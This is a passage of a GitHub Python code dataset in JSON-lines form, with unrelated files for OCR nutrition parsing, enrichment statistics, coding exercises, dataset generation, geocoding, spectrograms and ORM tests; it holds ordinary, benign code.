urllib.request.urlopen(img_name) as f:\r\n base64_data = base64.b64encode(f.read())\r\n code64 = base64_data.decode()\r\n return code64\r\n\r\n def get_ocr_response(self, img_code, access_token):\r\n \"\"\"\r\n OCR返回结果\r\n :param img_code:图片转码\r\n :param access_token: 访问token\r\n :return:\r\n \"\"\"\r\n host = 'https://aip.baidubce.com/rest/2.0/ocr/v1/general_basic?access_token=' + access_token\r\n datas = {'image': img_code}\r\n r = requests.post(host, data=datas)\r\n if r.status_code == 200:\r\n return r.content.decode('utf-8')\r\n else:\r\n return \"\"\r\n\r\n def ocr_action(self, df):\r\n \"\"\"\r\n OCR结果提取文字\r\n :param df: 原始dataframe,按行取信息\r\n :return:\r\n \"\"\"\r\n link = df['pic_links']\r\n if str(link) != 'nan' and len(link) > 0:\r\n link = link.split(',')[0]\r\n img_code = self.img_tobase64(link)\r\n response = self.get_ocr_response(img_code, self.access_token)\r\n jload = json.loads(response)\r\n words_result = jload['words_result']\r\n sentence = \"\"\r\n for i in range(len(words_result)):\r\n sentence += words_result[i]['words']\r\n df['sentence'] = sentence\r\n if \"营养\" in sentence:\r\n sentence = sentence.replace(\"O\", '0')\r\n sentence = sentence.replace(\" \",\"\")\r\n searchObj = re.findall(r'每份?\\(?(\\d{1,3}[m|毫]?[9|g|l|克|升|L]?)\\)?', sentence)\r\n if (len(searchObj) > 0):\r\n df['nutrition_basic'] = searchObj[0]\r\n searchObj = re.findall(r'能量(\\d{1,4})[k|千][J|焦|」]?', sentence)\r\n if (len(searchObj) > 0):\r\n df['energy'] = searchObj[0]\r\n searchObj = re.findall(r'蛋白质(\\d{1,3}\\.?\\d{0,2})[q|g|克]?', sentence)\r\n if (len(searchObj) > 0):\r\n df['protein'] = searchObj[0]\r\n searchObj = re.findall(r'脂肪(\\d{1,3}\\.?\\d{0,2})[a|g|q|克]?', sentence)\r\n if (len(searchObj) > 0):\r\n df['fat'] = searchObj[0]\r\n searchObj = re.findall(r'反式脂肪酸(\\d{1,3})[g|q|克]?', sentence)\r\n if (len(searchObj) > 0):\r\n df['trans_fat'] = searchObj[0]\r\n searchObj = re.findall(r'碳水化合物(\\d{1,3}\\.?\\d{0,2})[g|克]?', sentence)\r\n if (len(searchObj) > 0):\r\n df['carbohydrate'] = searchObj[0]\r\n searchObj = re.findall(r'膳食纤维(\\d{1,3}\\.?\\d{0,2})g?', sentence)\r\n if (len(searchObj) > 0):\r\n df['fiber'] = searchObj[0]\r\n searchObj = re.findall(r'钠(\\d{1,3})[m|毫]?[a|g|克]?', sentence)\r\n if (len(searchObj) > 0):\r\n df['sodium'] = searchObj[0]\r\n searchObj = re.findall(r'左旋肉碱(\\d{1,4})[m|毫]?[a|g|克]?', sentence)\r\n if (len(searchObj) > 0):\r\n df['carnitine'] = searchObj[0]\r\n return df","repo_name":"duwf2003/baidu_ocr","sub_path":"AILogic.py","file_name":"AILogic.py","file_ext":"py","file_size_in_byte":4359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4598903107","text":"n = int(input())\ndem = 0\na = [0]*10005\nmaxN=0\nwhile dem<n:\n s = list(map(int,input().split()))\n maxN = max(maxN,max(s))\n dem += len(s)\n for i in s:\n a[i] = 1\nkq = 1\nfor i in range(1,maxN+1):\n if a[i] ==0:\n kq = 0\n print(i)\nif kq ==1:\n print(\"Excellent!\")\n ","repo_name":"HongDuy119/CODE_PYTHON","sub_path":"PY02066 - BÀI TOÁN ĐẾM.py","file_name":"PY02066 - BÀI TOÁN ĐẾM.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22115637184","text":"from .. import utils\nfrom .. import ops\n\nsstats = utils.py.loadExternalModule(\"scipy.stats\")\nnp = utils.py.loadExternalModule('numpy')\n\nplt = utils.py.loadExternalModule('matplotlib.pylab') \nfc = utils.py.loadExternalModule('fastcluster')\nsp = utils.py.loadExternalModule('scipy')\n\nfrom collections import namedtuple\n\nfrom . import permutations\n\n@utils.decorators.deprecated(\"setEnrichment is deprecated. Use set_enrichment instead.\")\ndef setEnrichment(your_set, other_set, universe):\n \"\"\"\n Perform set enrichment using either a fisher exact test or the chi2 test.\n parameters:\n -----------\n your_set: list. Elements you want to test for enrichment\n other_set: list. Elements you want to see whether they are enriched in your_set\n universe: list. Total universe of elements\n abcd_values: Boolean. If True, it will return the actual element values in the contingency table, rather than just counts\n \n returns:\n Named tuple with:\n * oddsratio: fisher oddsratio\n * c2statistic : chi2 test statistic\n * pvalue : pvalue of test\n * table: contingency table [ [a,b],[c,d] ]\n - a: Overlap of the two sets\n - b: What is in other_set but not in your_set\n - c: what is in your_set but not in other_set\n - d: What is in universe but not in your_set or other_set\n * table_values: contingency table values [ [a,b],[c,d] ]\n - As see above\n * method : fisher|c2statistic\n \"\"\"\n return set_enrichment(your_set, other_set, universe)\n#edef\n\ndef set_enrichment(your_set, other_set, universe):\n \"\"\"\n Perform set enrichment using either a fisher exact test or the chi2 test.\n parameters:\n -----------\n your_set: list. Elements you want to test for enrichment\n other_set: list. Elements you want to see whether they are enriched in your_set\n universe: list. Total universe of elements\n abcd_values: Boolean. If True, it will return the actual element values in the contingency table, rather than just counts\n \n returns:\n Named tuple with:\n * oddsratio: fisher oddsratio\n * c2statistic : chi2 test statistic\n * pvalue : pvalue of test\n * table: contingency table [ [a,b],[c,d] ]\n - a: Overlap of the two sets\n - b: What is in other_set but not in your_set\n - c: what is in your_set but not in other_set\n - d: What is in universe but not in your_set or other_set\n * table_values: contingency table values [ [a,b],[c,d] ]\n - As see above\n * method : fisher|chi2\n \"\"\"\n\n \n resTuple = namedtuple(\"setEnrichmentResult\", [ 'oddsratio', 'c2statistic', 'pvalue', 'table', 'table_values', 'method'])\n\n universe = set(universe)\n your_set = set(your_set) & universe\n other_set = set(other_set) & universe\n \n a = your_set & other_set\n b = other_set - your_set\n c = your_set - other_set\n d = universe - (your_set | other_set)\n \n table = [ [len(a), len(b)], [len(c), len(d)]]\n if min(min(table)) <= 5:\n method = 'fisher'\n oddsratio, p = sstats.fisher_exact(table)\n chi2 = None\n else:\n method = 'chi2'\n chi2, p, dof, expected = sstats.chi2_contingency(table)\n oddsratio = 100\n if table[1][0] > 0 and table[0][1] > 0:\n oddsratio = table[0][0] * table[1][1] / (table[1][0] * table[0][1])\n else:\n oddsratio = np.inf\n #fi\n #fi\n\n return resTuple(oddsratio, chi2, p, table, [[a,b],[c,d]], method)\n#edef\n\ndef gsea(scores, membership, sort=True, sort_abs=True, p=1, side='both',\n max_perm=1000, min_perm=100, perm_thresh=0.2, plot=None):\n \"\"\"\n Gene Set Enrichment Analysis.\n \n parameters:\n -----------\n scores: A list of scores. Each score refers to a gene/locus/object/whatever.\n NOTE: the SMALLEST score will be at the TOP of the list. Thus, a ranking of\n [ 4,2,1,5 ] -> [ 1,2,4,5 ]\n membership: A list of 0/1 for each object, indicating whether it is in the desired set or not.\n sort: Are the items already sorted?\n sort_abs: Boolean. If sort, then sort the scores with absolute value (or not)\n p: Float, An exponent p to control the weight of the step.\n side: 'left' | 'right' | 'both', Calculate exceedences on which side\n left: Count number <= statistic\n right: Count number >= statistic\n both: min(left, right)\n max_perm: Integer. The maximum number of permutations to perform when calculating p-values\n We attempt to prevent many unnecessary permutations.\n min_perm: Integer. The absolute minimum number of permutations to perform.\n perm_thresh: Float. Only perform more permutations than min_perm if the % of exceedences of the\n statistic is less than this value\n plot: None|matplotlib.axis.\n if not None, plot the histogram \n \n Returns:\n --------\n a named tuple with:\n (es=enrichment_score,\n p=pvalue,\n i=number_of_genes_at_peak,\n idx=original_index_of_set_genes_at_peak)\n \"\"\"\n \n nt = namedtuple('GSEA_Result', [ 'es', 'p', 'i', 'idx'])\n \n if len(scores) != len(membership):\n raise ValueError(\"gsea: scores and membership must be same length\")\n #fi\n \n L = zip(range(len(scores)), scores, membership)\n L = sorted(L, key=lambda o: o[1])\n \n O, S, M = zip(*L)\n S = np.array(S)\n M = 1*np.array(M)\n O = np.array(O)\n\n N = len(S)\n NH = sum(M)\n \n if NH == 0:\n return nt(0, 1.0, N, [])\n #fi\n \n def calculate_es(s, m):\n NR = sum(s[m==1]**p)\n\n def pmiss(i):\n return sum(m[:i]==0) / (N - NH)\n #edef\n def phit(i):\n return sum((s[:i][m[:i]==1])**p)/NR\n #edef\n \n es_i = [ (i, phit(i) - pmiss(i)) for i in range(1, N) ]\n \n i, es = sorted(es_i, key=lambda x: x[1])[-1]\n \n return es, es_i, i\n #edef\n \n es, es_i, i = calculate_es(S, M)\n index_i = O[np.where(M[:i] == 1)]\n \n perm_es = [ calculate_es(S, np.random.choice(M, N, replace=False))[0] for i in range(min_perm) ]\n perm_steps = int(np.ceil(max_perm / 10))\n \n nex = 0\n while len(perm_es) < max_perm:\n if side == 'left':\n nex = len([e for e in perm_es if e <= es ])\n elif side == 'right':\n nex = len([e for e in perm_es if e >= es ])\n elif side == 'both':\n nex = min(len([e for e in perm_es if e <= es ]), \n len([e for e in perm_es if e >= es ]))\n else:\n raise ValueError(\"Unknown side: '%s'. See docstring.\" % side)\n #fi\n \n if nex / len(perm_es) > perm_thresh:\n break\n #fi\n \n perm_es.extend([ calculate_es(S, np.random.choice(M, N, replace=False))[0] for i in range(perm_steps) ])\n \n #ewhile\n return nt(es, permutations.pvalue(es, perm_es, side=side), i, index_i)\n#edef\n\n##############################################################################\n\nclass EnrichmentNetwork(object):\n \"\"\"\n Make a network visualization from the results of an enrichment.\n \"\"\"\n def __init__(self, enrichments, q_col='q', table_col='table', table_values_col='table_values'):\n \"\"\"\n \n parameters:\n -----------\n enrichments: pandas.DataFame\n Output from an enrichment. e.g. biu.db.KEGG.enrich, or biu.db.Reactome.enrich.\n q_col: String\n The name of the column with the corrected p-values\n table_col: String\n The name of the column with the contingency table\n table_values_col: String\n The name of the column with the object names in the contingency table (gene names rather than counts)\n \n Properties:\n -----------\n nodes: the original enrichments\n edges: The distance between terms\n \n draw(): Draw the network.\n \"\"\"\n def distance(a,b):\n if a == b:\n return 0\n #fi\n return 1/(np.log10(len(a&b) + 1)+1)\n #edef\n\n feat = enrichments[[q_col, table_col, table_values_col]].rename(columns={\n q_col: 'q',\n table_col : 'table',\n table_values_col : 'table_values'}).copy()\n feat['total'] = feat.table_values.apply(lambda x: x[0][0] | x[0][1])\n feat['n'] = feat.table.apply(lambda x: x[0][0])\n\n values = feat.total.to_dict()\n\n D = np.zeros([feat.shape[0]]*2)\n\n for i, (node_i, values_i) in enumerate(values.items()):\n for j, (node_j, values_j) in enumerate(values.items()):\n D[i,j] = D[j,i] = distance(values_i, values_j)\n #efor\n #efor\n \n self._enrichments = enrichments\n self._nodes = feat\n self._edges = D\n #edef\n \n @property\n def nodes(self):\n return self._nodes\n #edef\n \n @property\n def edges(self):\n return self._edges\n #edef\n \n def _embed(self, network):\n from sklearn.manifold import MDS\n E = MDS(n_components=2, dissimilarity='precomputed').fit_transform(self.edges)\n return E\n #edef\n \n def draw(self, distance_threshold=0.3, ax=None, cmap=None, nodes=None, n_clusters=1, min_qval=None):\n\n from sklearn.manifold import MDS\n from sklearn.manifold import Isomap\n import fastcluster\n import scipy as sp\n\n E = self._embed(self._edges)\n\n self._nodes['x'] = E[:,0]\n self._nodes['y'] = E[:,1]\n\n if ax is None:\n fig, axes = utils.figure.subplots(figsize=(10,10), dpi=300)\n ax = axes[0]\n #fi\n \n if min_qval is None:\n min_qval = self._nodes.q.min()\n #fi\n\n color = self._nodes.q.apply(lambda x: -np.log10(x)) / -np.log10(min_qval)\n cmap = plt.get_cmap('plasma') if cmap is None else cmap\n ax.scatter(self._nodes.x, self._nodes.y, s=self._nodes.n*4, edgecolor='k', c=cmap(color))\n for i, r in self._nodes.iterrows():\n ax.text(r.x, r.y, str(i))\n #efor\n\n #L = fc.linkage(sp.spatial.distance.squareform(self.edges, checks=False), method='complete')\n L = fc.linkage(E, metric='euclidean', method='complete')\n clusters = ops.lst.flatten(sp.cluster.hierarchy.cut_tree(L, n_clusters=n_clusters))\n\n for i,j in np.ndindex(self.edges.shape):\n if i > j:\n continue\n #fi\n\n if self.edges[i,j] < distance_threshold:\n if clusters[i] == clusters[j]:\n ax.plot([E[i,0],E[j,0]], [E[i,1],E[j,1]], zorder=-1, c='#565656', alpha=0.5)\n else:\n ax.plot([E[i,0],E[j,0]], [E[i,1],E[j,1]], zorder=-2, c='#eaeaea')\n #fi\n #fi\n #efor\n \n xlim, ylim = (ax.get_xlim(), ax.get_ylim())\n plotlim = ylim[0] + (ylim[1]-ylim[0])/10\n \n sizes = np.array([ 10, 25, 50, 100, 200, 300 ])\n sizes = sizes[ sizes <= max(self._nodes.n) ]\n stepsize = (ylim[1]-ylim[0])/10 / len(sizes)\n \n plt.scatter([xlim[0]+(xlim[1]-xlim[1])*0.1] * len(sizes),\n ylim[0] + (1 + np.array(range(len(sizes))))[::-1]*stepsize,\n c='k', edgecolor='k', s=sizes*4)\n \n dendfig, dendaxes = utils.figure.subplots(figsize=(20,5))\n dend = sp.cluster.hierarchy.dendrogram(L, ax=dendaxes[0], labels=self.nodes.index, )\n\n return ax.get_figure()\n #edef\n#eclass\n","repo_name":"thiesgehrmann/BIU","sub_path":"biu/stats/enrichment.py","file_name":"enrichment.py","file_ext":"py","file_size_in_byte":11721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72422075347","text":"'''\n The rules of the game are very simple. \n The players move in turns. Akshat won gold, so he makes the first move.\n During his/her move, a player must choose any remaining intersection point and \n remove from the grid all sticks which pass through this point. \n A player will lose the game if he/she cannot make a move \n (i.e. there are no intersection points remaining on the grid at his/her move).\n\nAssume that both players play optimally. Who will win the game?\n Link: https://codeforces.com/problemset/problem/451/A\n'''\n\ndef game_with_sticks(n, m):\n round_num = 0\n while n >= 1 and m >= 1:\n n -= 1\n m -= 1\n round_num += 1\n\n return \"Akshat\" if round_num % 2 != 0 else \"Malvika\"\n","repo_name":"hadrizia/coding","sub_path":"code/advanced_algorithms_problems/list_1/game_with_sticks.py","file_name":"game_with_sticks.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13957047412","text":"import datetime\nimport re\nfrom math import ceil\nfrom zoneinfo import ZoneInfo\n\nfrom dateparser import parse\n\nfrom utils.ids import TournamentReminders\n\n\ndef convert_to_utc(dtime: datetime.time, tz: str) -> datetime.time:\n \"\"\"Converts the time from a given timezone to the UTC time.\n We have to use this since timed tasks for some reason do not work with tzinfo.\n I don't know why since the docs say it should work but it just does not work for me.\n That's why we have to do ourselves.\n \"\"\"\n offset = datetime.datetime.now(ZoneInfo(tz)).utcoffset()\n temp_dtime = datetime.datetime.combine(datetime.datetime.now(ZoneInfo(tz)), dtime)\n return (temp_dtime - offset).time() if offset else temp_dtime.time()\n\n\ndef convert_time(input_time: str) -> tuple[int, str]:\n \"\"\"Converts the given input into raw seconds, plus a readable string.\"\"\"\n\n # 1d1h1m1s -> 1d 1h 1m 1s, also done for preventing false positives with absolute times.\n input_time = re.sub(r\"([dhms])(\\d)\", r\"\\1 \\2\", input_time)\n\n dt = parse(\n input_time,\n settings={\n \"PREFER_DAY_OF_MONTH\": \"first\",\n \"PREFER_DATES_FROM\": \"future\",\n \"TIMEZONE\": TournamentReminders.TIMEZONE,\n \"RETURN_AS_TIMEZONE_AWARE\": True,\n # We want the relative time to be parsed first, since it's the most common one.\n # Also there would be false positives with \"1h\" being parsed as 1:00am for example.\n \"PARSERS\": [\n \"relative-time\",\n \"timestamp\",\n \"custom-formats\",\n \"absolute-time\",\n \"no-spaces-time\",\n ],\n },\n )\n\n if dt:\n delta = ceil(dt.timestamp() - datetime.datetime.now().timestamp())\n\n return (delta, str(datetime.timedelta(seconds=delta)))\n\n return None, None\n","repo_name":"SSBUTrainingGrounds/Tabuu-3.0","sub_path":"utils/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"11034176800","text":"#!/usr/bin/env python\n\n\"\"\"\n convnet/main.py\n\"\"\"\n\nimport sys\nimport json\nimport argparse\nimport numpy as np\nfrom time import time\n\n# --\n# User code\n# Note: Depending on how you implement your model, you'll likely have to change the parameters of these\n# functions. They way their shown is just one possble way that the code could be structured.\n\ndef make_model(input_channels, output_classes, residual_block_sizes, scale_alpha, optimizer, lr, momentum):\n # ... your code here ...\n return model\n\n\ndef make_train_dataloader(X, y, batch_size, shuffle):\n # ... your code here ...\n return dataloader\n\n\ndef make_test_dataloader(X, batch_size, shuffle):\n # ... your code here ...\n return dataloader\n\n\ndef train_one_epoch(model, dataloader):\n # ... your code here ...\n return model\n\n\ndef predict(model, dataloader):\n # ... your code here ...\n return predictions\n\n# --\n# CLI\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--cuda', action=\"store_true\")\n parser.add_argument('--num-epochs', type=int, default=5)\n parser.add_argument('--lr', type=float, default=0.1)\n parser.add_argument('--momentum', type=float, default=0.9)\n parser.add_argument('--batch-size', type=int, default=128)\n return parser.parse_args()\n\nif __name__ == '__main__':\n args = parse_args()\n \n # --\n # IO\n \n # X_train: tensor of shape (number of train observations, number of image channels, image height, image width)\n # X_test: tensor of shape (number of train observations, number of image channels, image height, image width)\n # y_train: vector of [0, 1] class labels for each train image\n # y_test: vector of [0, 1] class labels for each test image (don't look at these to make predictions!)\n \n X_train = np.load('data/cifar2/X_train.npy')\n X_test = np.load('data/cifar2/X_test.npy')\n y_train = np.load('data/cifar2/y_train.npy')\n y_test = np.load('data/cifar2/y_test.npy')\n \n # --\n # Define model\n \n model = make_model(\n input_channels=3,\n output_classes=2,\n residual_block_sizes=[\n (16, 32),\n (32, 64),\n (64, 128),\n ],\n scale_alpha=0.125,\n optimizer=\"SGD\",\n lr=args.lr,\n momentum=args.momentum,\n )\n \n # --\n # Train\n \n t = time()\n for epoch in range(args.num_epochs):\n \n # Train\n model = train_one_epoch(\n model=model,\n dataloader=make_train_dataloader(X_train, y_train, batch_size=args.batch_size, shuffle=True)\n )\n \n # Evaluate\n preds = predict(\n model=model,\n dataloader=make_test_dataloader(X_test, batch_size=args.batch_size, shuffle=False)\n )\n \n assert isinstance(preds, np.ndarray)\n assert preds.shape[0] == X_test.shape[0]\n \n test_acc = (preds == y_test.squeeze()).mean()\n \n print(json.dumps({\n \"epoch\" : int(epoch),\n \"test_acc\" : test_acc,\n \"time\" : time() - t\n }))\n sys.stdout.flush()\n \n elapsed = time() - t\n print('elapsed', elapsed, file=sys.stderr)\n \n # --\n # Save results\n \n os.makedirs('results', exist_ok=True)\n \n np.savetxt('results/preds', preds, fmt='%d')\n open('results/elapsed', 'w').write(str(elapsed))","repo_name":"prog-eval/prog-eval","sub_path":"convnet/main-redacted.py","file_name":"main-redacted.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"9264425659","text":"\"\"\"\nMain script for creating datasets.\nSome parameters are more important than others:\n- WIDTH: Width of images in dataset\n- HEIGHT: Height of images in dataset\n- SYNTHETIC_RATIO: Synthetic:real, the ratio of synthetic bricks to real bricks. \n Set this to a high value since the number of real brick cutouts are relatively few.\n- SIZE: Number of images in dataset.\n\"\"\"\n\nimport build_dataset as build\nimport augment_dataset as augment\n\n# Select if you want to generate A, B or not.\nGENERATE_A = True\nGENERATE_B = True\n\n# Directories for backgrounds and brick cutouts.\nBACKGROUNDIR_GRAY = \"data/backgrounds/gray\"\nBACKGROUNDIR_WILD = \"data/backgrounds/wild\"\nDATADIR_SYNTHETIC = \"data/bricks_3D\" \nDATADIR_RAW = \"data/bricks_photo\"\nPIECES = [\"2540\", \"3001\", \"3003\", \"3004\", \"3020\", \"3021\", \"3022\", \"3023\", \"3039\", \"3660\"]\n\n# Write directories. Change between making different datasets if you don't want to overwrite\nWRITEDIR_A = \"data/datasets/A\"\nWRITEDIR_B = \"data/datasets/B\"\n\n# Parameters\nWIDTH = 600\nHEIGHT = 400\nSYNTHETIC_RATIO = 10\nSIZE = 10\n\nif GENERATE_A:\n # GENERATE\n build.build_dataset(BACKGROUNDIR_WILD, PIECES, DATADIR_SYNTHETIC, DATADIR_RAW, SIZE,\n WRITEDIR_A, idx=0, synt_ratio=SYNTHETIC_RATIO, back_width=WIDTH, \n back_height=HEIGHT, colour=\"random\", rotation='random',placement_style=\"random\")\n\n # AUGMENT\n augment.augment_dataset(WRITEDIR_A, add_noise=True, add_blur=True, \n add_motion_blur=True, to_black_and_white=False, noise_mean=0, noise_std=0.1, \n blur_kernel=(1,1), motion_blur_dir=\"horizontal\", motion_blur_factor=3, overwrite=True)\n\nif GENERATE_B:\n # GENERATE\n build.build_dataset(BACKGROUNDIR_GRAY, PIECES, DATADIR_SYNTHETIC, DATADIR_RAW, SIZE, \n WRITEDIR_B, idx=0, synt_ratio=SYNTHETIC_RATIO, back_width=WIDTH, \n back_height=HEIGHT, colour=\"grey\", rotation='random',placement_style=\"uniform\")\n\n # AUGMENT\n augment.augment_dataset(WRITEDIR_B, add_noise=False, add_blur=False, \n add_motion_blur=True, to_black_and_white=True, noise_mean=0, noise_std=0, \n blur_kernel=(1,1), motion_blur_dir=\"horizontal\", motion_blur_factor=10, overwrite=True)","repo_name":"mndahlen/CS433-LEGO-DETECTION","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74554478865","text":"import requests\n\ndef procurar(nomeLugar):\n base_url = \"https://nominatim.openstreetmap.org/search\"\n \n params = {\n \"q\": nomeLugar,\n \"format\": \"json\"\n }\n \n response = requests.get(base_url, params=params)\n data = response.json()\n \n if data:\n first_result = data[0]\n address = first_result.get(\"display_name\")\n print(\"Endereço:\", address)\n return address\n else:\n print(\"Local não encontrado.\")","repo_name":"Luiz-Dinani/Anonimizador-Tilapias","sub_path":"services_references/openMapAPI.py","file_name":"openMapAPI.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34070284871","text":"# for file utilities\nimport os.path\n# for visualizing the data\nimport matplotlib.pyplot as plt\n# for .wav file handling\nimport scipy.io.wavfile as wavfile\n\n\ndef make_spectrogram(file_path, destination_folder):\n # Extract file name from path\n file_name = os.path.basename(file_path)\n\n # Read given .wav file data\n print('Reading: ' + file_name)\n fs, aud = wavfile.read(file_path)\n print(aud.shape)\n\n # Select left channel only\n if len(aud.shape) > 1:\n aud = aud[:, 0]\n\n # Trim the first 10 seconds\n if aud.shape[0] > int(fs*5):\n first = aud[:int(fs*5)]\n else:\n first = aud\n\n # Create spectrogram plot\n power_spectrum, frequencies_sound, time, image_axis = plt.specgram(first, Fs=fs)\n plt.axis('off')\n\n # Check for destination folder\n # Create destination folder if none exists\n if not os.path.isdir(destination_folder):\n os.mkdir(destination_folder)\n\n # Save spectrogram image\n image_name = file_name[:-4] + '.png'\n print('Writing ' + image_name + ' to ' + destination_folder)\n plt.savefig(os.path.join(destination_folder, image_name), bbox_inches='tight', pad_inches=0)\n\n\nif __name__ == '__main__':\n make_spectrogram('Boredom.wav', 'images/')\n","repo_name":"mattferral/spectrogram_maker","sub_path":"spectrogram.py","file_name":"spectrogram.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25946853401","text":"#!/usr/bin/python3\n'''\nFunction to add to numbers (integer or float)\n'''\n\n\ndef add_integer(a, b=98):\n '''\n add integer function definition\n '''\n if type(a) != int and type(a) != float:\n raise TypeError(\"a must be an integer\")\n if type(b) != int and type(b) != float:\n raise TypeError(\"b must be an integer\")\n return int(a + b)\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testfile(\"tests/0-add_integer.txt\")\n","repo_name":"davidajimati/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41126921585","text":"from Helper import *\nclass MetricsticsCalculation:\n # Static method to calculate the minimum value in the given data\n @staticmethod\n def get_min(data,number):\n if not data:\n raise ValueError(\"Please enter comma separated values in order to calculate statistics\")\n minimum_value = data[0]\n for value in data:\n if value < minimum_value:\n minimum_value = value\n return minimum_value\n # Static method to calculate the max value in the given data\n @staticmethod\n def get_max(data,number):\n if not data:\n raise ValueError(\"Please enter comma separated values in order to calculate statistics\")\n maximum_value = data[0]\n for value in data:\n if value > maximum_value:\n maximum_value = value\n return maximum_value\n # Static method to calculate the mean value in the given data\n @staticmethod\n def get_mean(data,count):\n if not data:\n raise ValueError(\"Please enter comma separated values in order to calculate statistics\")\n\n total = 0\n for value in data:\n total += value\n\n return total / count\n # Static method to calculate the mad value in the given data\n @staticmethod\n def get_mad(data,n):\n if not data:\n raise ValueError(\"Please Enter comma separated values in order to calculate statistics\")\n\n # mean calculation of the given data set.\n mean = MetricsticsCalculation.get_mean(data,n) \n # Calculate the total absolute deviation \n total_deviation = 0\n for x in data:\n diff = x - mean\n total_deviation += diff if diff >= 0 else -diff\n\n mad = total_deviation / n\n return mad\n # Static method to calculate the median value in the given data\n @staticmethod\n def get_median(data,number):\n if not data:\n raise ValueError(\"Please enter comma separated values in order to calculate statistics\")\n \n # Sorting using Bubble Sort\n data = Helper.merge_sort(data)\n\n # Calculate the median based on the sorted data set.\n if number % 2 == 0:\n middle1 = data[number // 2 - 1]\n middle2 = data[number // 2]\n return (middle1 + middle2) / 2\n else:\n return data[number // 2] \n \n # Static method to calculate the mode value in the given data\n @staticmethod\n def get_mode(data,n):\n if not data:\n raise ValueError(\"Please enter comma separated values in order to calculate statistics\")\n\n counts = {}\n max_count = 0\n mode = []\n\n for x in data:\n if x in counts:\n counts[x] += 1\n else:\n counts[x] = 1\n\n if counts[x] > max_count:\n max_count = counts[x]\n\n for key in counts:\n value = counts[key]\n if value == max_count:\n if not mode:\n mode = [key]\n else:\n mode = mode + [key]\n\n return mode\n \n # Static method to calculate the standard deviation value in the given data\n @staticmethod\n def get_stddev(data,n):\n if not data:\n raise ValueError(\"Please enter comma separated values in order to calculate statistics\")\n\n mean = MetricsticsCalculation.get_mean(data,n)\n total_squared_deviation = 0\n\n for value in data:\n total_squared_deviation += (value - mean) ** 2\n\n return (total_squared_deviation / n) ** 0.5\n","repo_name":"bhargav0425/SM_Group_L","sub_path":"METRICSTICS/Code/MetricsticsCalculation.py","file_name":"MetricsticsCalculation.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14914286456","text":"import unittest\n\nfrom storm.locals import *\nfrom storm.exceptions import IntegrityError\n\nfrom bosco.runner import Runner, RunnerException, SICard\n\nclass RunnerTest(unittest.TestCase):\n\n # Create store as class variable so that every test uses the same\n # database connection\n _store = Store(create_database('postgres:bosco_test'))\n\n def tearDown(self):\n # Clean up Database\n self._store.rollback()\n\n def testStoreAdd(self):\n \"\"\"\n Test that a runner is added to the store if a store is given to the\n constructor.\n \"\"\"\n r = Runner(u'Bernasconi', u'Maria')\n self.assertEquals(Store.of(r), None)\n self._store.add(r)\n self.assertEquals(Store.of(r), self._store)\n\n def testDoubleSICard(self):\n \"\"\"\n Test that creating two SICard objects with the same id raises an error.\n \"\"\"\n\n r1 = self._store.add(Runner(u'Hans', u'Muster', SICard(987655)))\n r2 = self._store.add(Runner(u'Bernasconi', u'Maria', SICard(987655)))\n self.assertRaises(IntegrityError, self._store.flush)\n\n def testMultipleSICards(self):\n \"\"\"\n Runners can have multiple SI-cards.\n \"\"\"\n \n s1 = SICard(987655)\n r = self._store.add(Runner(u'Hans', u'Muster', s1))\n s2 = SICard(765444)\n r.sicards.add(s2)\n self.failUnless(s1 in r.sicards and s2 in r.sicards)\n\n def testReassignFails(self):\n \"\"\"\n Test that reassign an already assign SICard fails.\n \"\"\"\n\n si = SICard(987655)\n r1 = self._store.add(Runner(u'Hans', u'Muster', si))\n r2 = self._store.add(Runner(u'Bernasconi', u'Maria', SICard(765444)))\n self._store.flush()\n self.assertRaises(RunnerException, r2.sicards.add, si)\n\n def testUnassignAssign(self):\n \"\"\"\n First unassigning an SI-card and the assigning to another runner\n should work.\n \"\"\"\n si = SICard(987655)\n r1 = self._store.add(Runner(u'Hans', u'Muster', si))\n r2 = self._store.add(Runner(u'Bernasconi', u'Maria', SICard(765444)))\n r1.sicards.remove(si)\n try:\n r2.sicards.add(si)\n self._store.flush()\n except RunnerException:\n self.fail(\"RunnerException raised although SI-card reassignment should \"\n \"work.\")\n self.failUnless(si in r2.sicards)\n\n def testReassigSame(self):\n \"\"\"\n Test that reassigning an SI-card to the same runner it is already assigned\n works.\n \"\"\"\n si = SICard(987655)\n r = self._store.add(Runner(u'Hans', u'Muster', si))\n try:\n r.sicards.add(si)\n self._store.flush()\n except RunnerException:\n self.fail(\"RunnerException raised although SI-card reassignment should \"\n \"work.\")\n self.failUnless(si in r.sicards)\n\n \n","repo_name":"gaudenz/bosco","sub_path":"bosco/test/runner_test.py","file_name":"runner_test.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"42497565435","text":"import streamlit as st\nimport stream.plotstream as grap\nimport stream.predict as 